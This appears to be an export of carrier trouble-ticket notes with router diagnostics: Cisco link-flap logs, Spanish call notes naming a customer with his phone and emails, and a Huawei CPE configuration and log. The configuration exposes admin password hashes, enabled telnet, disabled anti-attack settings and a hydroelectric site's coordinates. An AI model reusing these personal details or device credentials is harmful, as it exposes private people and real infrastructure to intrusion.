*APR 24 00:46:18.371: %SNMP-5-COLDSTART: SNMP AGENT ON HOST CISCO_1921_COOPERATIVA_SONAGUERA_CENTRA IS UNDERGOING A COLD START
*APR 24 00:46:19.011: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*APR 24 00:46:19.011: %LINK-5-CHANGED: INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*APR 24 00:46:20.011: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*APR 24 00:46:20.011: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO DOWN
*APR 24 00:49:54.391: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*APR 24 00:49:55.391: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*APR 24 00:50:11.391: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*APR 24 00:50:12.391: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*APR 24 00:50:30.391: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*APR 24 00:50:31.399: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
*APR 24 00:50:34.391: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*APR 24 00:50:35.391: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
*APR 26 09:21:07.377: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*APR 26 09:21:08.377: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*APR 26 09:21:38.377: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*APR 26 09:21:39.377: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*APR 26 09:22:02.377: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*APR 26 09:22:03.377: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*APR 26 09:22:20.377: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*APR 26 09:22:21.377: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*APR 29 17:29:06.074: %SYS-5-CONFIG_I: CONFIGURED FROM CONSOLE BY CLARO ON VTY0 (10.31.210.19)
*MAY  3 09:20:45.340: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*MAY  3 09:20:46.340: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*MAY  3 09:21:14.340: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*MAY  3 09:21:15.340: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*MAY  3 09:21:37.340: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*MAY  3 09:21:38.340: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*MAY  3 09:21:59.340: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*MAY  3 09:22:00.340: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*MAY 10 09:21:00.298: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*MAY 10 09:21:01.298: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*MAY 10 09:21:28.298: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*MAY 10 09:21:29.298: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*MAY 10 09:21:51.298: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*MAY 10 09:21:52.298: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*MAY 10 09:22:10.298: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*MAY 10 09:22:11.298: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*MAY 17 09:20:47.256: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*MAY 17 09:20:48.256: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*MAY 17 09:21:17.256: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*MAY 17 09:21:18.256: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*MAY 17 09:21:40.256: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*MAY 17 09:21:41.256: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*MAY 17 09:21:58.256: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*MAY 17 09:21:59.256: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*MAY 24 09:20:34.215: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*MAY 24 09:20:35.215: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*MAY 24 09:21:04.215: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*MAY 24 09:21:05.215: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*MAY 24 09:21:26.215: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*MAY 24 09:21:27.215: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*MAY 24 09:21:44.215: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*MAY 24 09:21:45.215: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*MAY 31 09:20:50.173: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*MAY 31 09:20:51.173: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*MAY 31 09:21:19.173: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*MAY 31 09:21:20.173: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*MAY 31 09:21:42.173: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*MAY 31 09:21:43.173: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*MAY 31 09:22:00.173: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*MAY 31 09:22:01.173: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*JUN  7 09:20:40.131: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*JUN  7 09:20:41.131: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*JUN  7 09:21:08.131: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*JUN  7 09:21:09.131: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*JUN  7 09:21:31.131: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*JUN  7 09:21:32.131: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO DOWN
*JUN  7 09:21:50.131: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
*JUN  7 09:21:51.131: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0/0, CHANGED STATE TO UP
CISCO_1921_COOPERATIVA_SONAGUERA_CENTRA#
SHOW CLOCK
*02:24:32.387 UTC WED JUN 8 2022
CISCO_1921_COOPERATIVA_SONAGUERA_CENTRA#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.2.51.9              14   24A5.2C1F.E891  ARPA   GIGABITETHERNET0/0.169
INTERNET  10.2.51.10              -   ECBD.1D3C.DB00  ARPA   GIGABITETHERNET0/0.169
INTERNET  10.82.76.1             14   24A5.2C1F.E891  ARPA   GIGABITETHERNET0/0.2305
INTERNET  10.82.76.18             -   ECBD.1D3C.DB00  ARPA   GIGABITETHERNET0/0.2305
INTERNET  190.105.129.225         -   ECBD.1D3C.DB08  ARPA   GIGABITETHERNET0/0/0
INTERNET  190.105.129.226         0   INCOMPLETE      ARPA
INTERNET  190.105.129.227         1   0001.2100.CF4D  ARPA   GIGABITETHERNET0/0/0
INTERNET  190.105.129.228         1   0001.2100.CF4D  ARPA   GIGABITETHERNET0/0/0
INTERNET  190.105.129.229         0   INCOMPLETE      ARPA
INTERNET  190.105.129.230         0   INCOMPLETE      ARPA
INTERNET  190.105.129.231         0   INCOMPLETE      ARPA
INTERNET  190.105.129.233         0   INCOMPLETE      ARPA
INTERNET  190.105.129.234         0   INCOMPLETE      ARPA
INTERNET  190.105.129.235         0   INCOMPLETE      ARPA
INTERNET  190.105.129.236         0   INCOMPLETE      ARPA
INTERNET  190.105.129.237         0   INCOMPLETE      ARPA
INTERNET  190.105.129.238         0   INCOMPLETE      ARPA
CISCO_1921_COOPERATIVA_SONAGUERA_CENTRA#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
EM0/0                          ADMIN DOWN     DOWN
GI0/0                          UP             UP
GI0/0.169                      UP             UP       INTERFACE_INTERNET ID549454
GI0/0.2305                     UP             UP       GESTION
GI0/0.3005                     UP             UP       INTERFACE_DATOS ID549549
GI0/1                          UP             UP       (HACIA MIKROTIK CENTRAL)
GI0/0/0                        UP             UP       VLAN INTERNET
CISCO_1921_COOPERATIVA_SONAGUERA_CENTRA#
SHOW IP INT BRIEF
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         UNASSIGNED      YES NVRAM  UP                    UP
GIGABITETHERNET0/0.169     10.2.51.10      YES NVRAM  UP                    UP
GIGABITETHERNET0/0.2305    10.82.76.18     YES NVRAM  UP                    UP
GIGABITETHERNET0/0.3005    10.2.41.30      YES NVRAM  UP                    UP
GIGABITETHERNET0/1         172.17.1.1      YES NVRAM  UP                    UP
GIGABITETHERNET0/0/0       190.105.129.225 YES NVRAM  UP                    UP
CISCO_1921_COOPERATIVA_SONAGUERA_CENTRA#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 10.2.51.10
  PING 10.2.51.10: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.2.51.10 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/2 MS
RUTA IP:
PE: 10.179.32.55
DISPLAY IP ROUTING-TABLE 10.2.51.10
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : _PUBLIC_
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
     10.2.51.10/32  DIRECT  0    0                 0.0.0.0         VLANIF169			</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS MORAZAN 95715971 QUIEN SOLICITA LAS GRAFICAS DE CONSUMO
CARLOS.MORAZAN@CAYCSOL.COOP.HN-
-ID 2001067033</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS MORAZAN 95715971  INDICA QUE NO RECIBIO EL CORREO CON LAS GRAFICAS DE CONSUMO SOLICITA QUE SE LE REENVIE  CON COPIA AL CORREO EDUARDOMORAZAN@GMAIL.COM PARA QUE EL NOS PUEDA VALIDAR || SE NOTIFICA A GESTOR **
-ID 2001209101
**
**</t>
  </si>
  <si>
    <t>SE REALIZAN PRUEBAS CON EL CLIENTE LO CUAL SE REALIZA PRUEBAS CON EL CLIENTE
Y CON EL INGENIERO DE INFORMATICA EL CUAL INDICA QUE SE DEJE EL TTK EN MONITOREO PARA PODER VALIDAR ELLOS A NIVEL DE RED INTERNA.</t>
  </si>
  <si>
    <t>SE HABLA CON EL CLIENTE Y SE REENVIA EL CORREO CON EVIDENCIA DEL SERVICIO PARA UQ EPUEDA EL CLIENTE CORROBORAR</t>
  </si>
  <si>
    <t>SE TIENE EN LÍNEA A CARLOS MORAZÁN/CLIENTE, SE LE INDICA ENLACE OK, ASEGURA QUE NO HA RECIBIDO LOS CORREOS:
CARLOS.MORAZAN@CAYCSOL.COOP.HN
EDUARDOMORAZAN@GMAIL.COM
SE PIDE APOYO A GESTIÓN N1 VÍA SKYPE, VÍA TELEFÓNICA APOYA RAÚL ALVAREZ/GESTOR, EN TRIPARTITA, ÉSTOS ESTÁN VIENDO EL CASO, EN ESPERA DE LO QUE DETERMINEN.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS MORAZAN 95715971  NO RESPONDE, SE INTENTARA LUEGO
-ID 2001139540</t>
  </si>
  <si>
    <t>SE ENVIA CORREO PARA VALIDACION DEL CLIENTE SE PROCEDE A VALIDAR CON EL CLIENTE VIA CORREO SE PORCEDE A DEJAR EN ETAPA PENDIENTE CLIENTE POR PARTE DE CLARO.
DE: RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;
ENVIADO: MARTES, 7 DE JUNIO DE 2022 20:19
PARA: CARLOS.MOZARAN@CAYCSOL.COOP.HN &lt;CARLOS.MOZARAN@CAYCSOL.COOP.HN&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: SEGUIMIENTO AL TTK SD1133095
ESTIMADO CLIENTE EL MOTIVO DEL CORREO ES PARA RETROALIMENTARLE CON EL INCIDENTE QUE SE TUVO SOBRE EL ENLACE SE TUVO UNA PEQUEÑA INTERMITENCIA A NIVEL DE ULTIMA MILLA LO CUAL PROVOCO UNA CAÍDA MOMENTÁNEA EN EL SERVICIO SE OBSERVA QUE FUE UNA CAÍDA EN LA INTERFACE QUE CONECTA CON EL EQUIPO DE ÚLTIMA MILLA YA SE ENCUENTRA OPERATIVO AGRADECEMOS QUE PUEDA VALIDAR QUE SE ENCUENTRE TODO OPERATIVO</t>
  </si>
  <si>
    <t>F4593631</t>
  </si>
  <si>
    <t xml:space="preserve">
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO SE PORCEDE A VALIDAR CON EL CLIENTE ENLACE OK .
ROUTER CPE ACTIVO HACE 1 SEMANA.
HUAWEI VERSATILE ROUTING PLATFORM SOFTWARE
VRP (R) SOFTWARE, VERSION 5.170 (AR100 V200R009C00SPC500)
COPYRIGHT (C) 2011-2018 HUAWEI TECH CO., LTD
HUAWEI AR109W ROUTER UPTIME IS 1 WEEK, 1 DAY, 10 HOURS, 30 MINUTES
MPU 0(MASTER) : UPTIME IS 1 WEEK, 1 DAY, 10 HOURS, 29 MINUTES
SDRAM MEMORY SIZE    : 512     M BYTES
FLASH 0 MEMORY SIZE  : 512     M BYTES
MPU VERSION INFORMATION :
1. PCB      VERSION  : AR129CGVW-L VER.C
2. MAB      VERSION  : 0
3. BOARD    TYPE     : AR109W
4. BOOTROM  VERSION  : 1
&lt;CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC&gt;
CONFIGURACION DEL CPE:
DISPLAY  CURRENT-CONFIGURATION
[V200R009C00SPC500]
#
 SYSNAME CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC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UNDO ANTI-ATTACK ABNORMAL ENABLE
UNDO ANTI-ATTACK FRAGMENT ENABLE
UNDO ANTI-ATTACK ICMP-FLOOD ENABLE
UNDO ANTI-ATTACK TCP-SYN ENABLE
UNDO ANTI-ATTACK UDP-FLOOD ENAB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GESTIONIP PASSWORD IRREVERSIBLE-CIPHER $1A$7VGL9B!ZQJ$T~6OQHQFLU!&lt;$|8^,.@6TZZ\%2;L0I#JYU7&lt;-`(6$
 LOCAL-USER GESTIONIP PRIVILEGE LEVEL 15
 LOCAL-USER GESTIONIP FTP-DIRECTORY FLASH:/
 LOCAL-USER GESTIONIP SERVICE-TYPE TELNET SSH FTP
#
WEB
 USER-SET DEFAULT
 USER-SET VIP
#
FIREWALL ZONE LOCAL
#
INTERFACE VLANIF1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 186.151.194.89 255.255.255.248
 QOS CAR INBOUND CIR 20480 CBS 3850240 PBS 6410240 GREEN PASS YELLOW PASS RED DISCARD
 QOS CAR OUTBOUND CIR 20480 CBS 3850240 PBS 6410240 GREEN PASS YELLOW PASS RED DISCARD
#
INTERFACE ETHERNET0/0/0
#
INTERFACE GIGABITETHERNET0/0/0
#
INTERFACE GIGABITETHERNET0/0/1
#
INTERFACE GIGABITETHERNET0/0/2
#
INTERFACE GIGABITETHERNET0/0/3
#
INTERFACE GIGABITETHERNET0/0/4
 DESCRIPTION WAN PRINCIPAL/_/380300003T/_/
 SET FLOW-STAT INTERVAL 30
 BANDWIDTH 20480 KBPS
 IP ADDRESS 10.72.125.66 255.255.255.252
 UNDO ICMP HOST-UNREACHABLE SEND
 UNDO ICMP PORT-UNREACHABLE SEND
 UNDO ICMP TTL-EXCEEDED SEND
#
INTERFACE GIGABITETHERNET0/0/5
 DESCRIPTION VIRTUALPORT
 IP ADDRESS DHCP-ALLOC
#
INTERFACE WLAN-BSS7
 PORT HYBRID TAGGED VLAN 1
#
INTERFACE NULL0
#
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL NOC
 IP ADDRESS 10.212.171.254 255.255.255.255
#
CPU-DEFEND POLICY ICMP
 PACKET-TYPE ICMP RATE-LIMIT 1200
#
 CPU-DEFEND-POLICY ICMP
#
 SNMP-AGENT LOCAL-ENGINEID 800007DB03E0CC7A07CB03
 SNMP-AGENT COMMUNITY READ %^%#JXVP,)}FFU6"H-'U)I[&gt;7|P+.N&lt;HLL1F!!STWGQR!GW4F{(#*N(OV}G)'T&gt;V0-2."/TG9,SJK{8FS&gt;1J%^%# ACL 2988
 SNMP-AGENT SYS-INFO LOCATION CASA DE MAQUINAS HIDRO ELECTRICA SANTA TERESA 15 17 47.94N 90 8 39.19W
 SNMP-AGENT SYS-INFO VERSION V2C
 SNMP-AGENT TRAP SOURCE LOOPBACK5
 SNMP-AGENT
#
 TELNET SERVER ENABLE
#
 SET WEB LOGIN-STYLE SIMPLE
 HTTP SECURE-SERVER SSL-POLICY DEFAULT_POLICY
 HTTP SERVER ENABLE
 HTTP SECURE-SERVER ENABLE
 HTTP SERVER PERMIT INTERFACE VLANIF1
#
IP ROUTE-STATIC 0.0.0.0 0.0.0.0 10.72.125.65
#
FIB REGULARLY-REFRESH DISABLE
#
USER-INTERFACE CON 0
 AUTHENTICATION-MODE PASSWORD
 SET AUTHENTICATION PASSWORD CIPHER %^%#-[=[VYR`MNX+F5;SK=O=VL2R-5&amp;X/LK;{6E;/JX*$J'XBU{R~HLF%$T{CKJ6%^%#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AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC&gt;
LOG DEL ROUTER CPE:
DISPLAY LOGBUFFER
LOGGING BUFFER CONFIGURATION AND CONTENTS: ENABLED
ALLOWED MAX BUFFER SIZE: 1024
ACTUAL BUFFER SIZE: 512
CHANNEL NUMBER: 4, CHANNEL NAME: LOGBUFFER
DROPPED MESSAGES: 0
OVERWRITTEN MESSAGES: 1535
CURRENT MESSAGES: 512
JUN  7 2022 09:32:20+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01NTP/4/PACKET_LENGTH_WRONG(L)[0]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
JUN  7 2022 09:31:58+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01INFO/4/SUPPRESS_LOG(L)[1]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
JUN  7 2022 09:12:38+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01NTP/4/PACKET_LENGTH_WRONG(L)[2]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=12)
JUN  7 2022 09:09:13+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01INFO/4/SUPPRESS_LOG(L)[3]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
JUN  7 2022 09:09:02+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01NTP/4/PACKET_LENGTH_WRONG(L)[4]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=12)
JUN  7 2022 08:11:14+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[5]:FAILED TO LOGIN. (IP=31.220.3.140, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  7 2022 07:54:40+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[6]:FAILED TO LOGIN. (IP=177.55.157.164, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  7 2022 07:54:09+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[7]:FAILED TO LOGIN. (IP=190.115.155.220, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  7 2022 07:49:56+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01NTP/4/PACKET_LENGTH_WRONG(L)[8]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
JUN  7 2022 07:26:11+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01NTP/4/PACKET_LENGTH_WRONG(L)[9]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
JUN  7 2022 07:12:07+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01INFO/4/SUPPRESS_LOG(L)[10]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
JUN  7 2022 07:11:21+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01NTP/4/PACKET_LENGTH_WRONG(L)[11]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=8)
JUN  7 2022 07:08:30+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01INFO/4/SUPPRESS_LOG(L)[12]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
JUN  7 2022 07:02:23+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01NTP/4/PACKET_LENGTH_WRONG(L)[13]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=8)
JUN  7 2022 06:36:35+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01NTP/4/PACKET_LENGTH_WRONG(L)[14]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
JUN  7 2022 06:08:08+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01NTP/4/PACKET_LENGTH_WRONG(L)[15]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
JUN  7 2022 04:22:30+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[16]:FAILED TO LOGIN. (IP=31.220.3.140, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
JUN  7 2022 03:11:27+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01NTP/4/PACKET_LENGTH_WRONG(L)[17]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
JUN  7 2022 03:10:12+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01INFO/4/SUPPRESS_LOG(L)[18]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
JUN  7 2022 03:10:03+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01NTP/4/PACKET_LENGTH_WRONG(L)[19]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=8)
JUN  7 2022 03:08:27+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01NTP/4/PACKET_LENGTH_WRONG(L)[20]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
JUN  7 2022 03:08:27+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01INFO/4/SUPPRESS_LOG(L)[21]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
JUN  7 2022 03:07:05+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01NTP/4/PACKET_LENGTH_WRONG(L)[22]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=8)
JUN  7 2022 02:45:07+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01NTP/4/PACKET_LENGTH_WRONG(L)[23]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
JUN  7 2022 02:07:13+00:00 CC_AGRO_COMERCIALIZADORA_GT_INTERNET_POLOCHIC %%01LINE/4/LOGIN_FAIL(S)[24]:FAILED TO LOGIN. (IP=31.220.3.140, REASON="THE NUMBER OF USERS THAT LOG IN TO THE SERVER THROUGH THE CHANNEL REACHES THE UPPER LIMIT.")
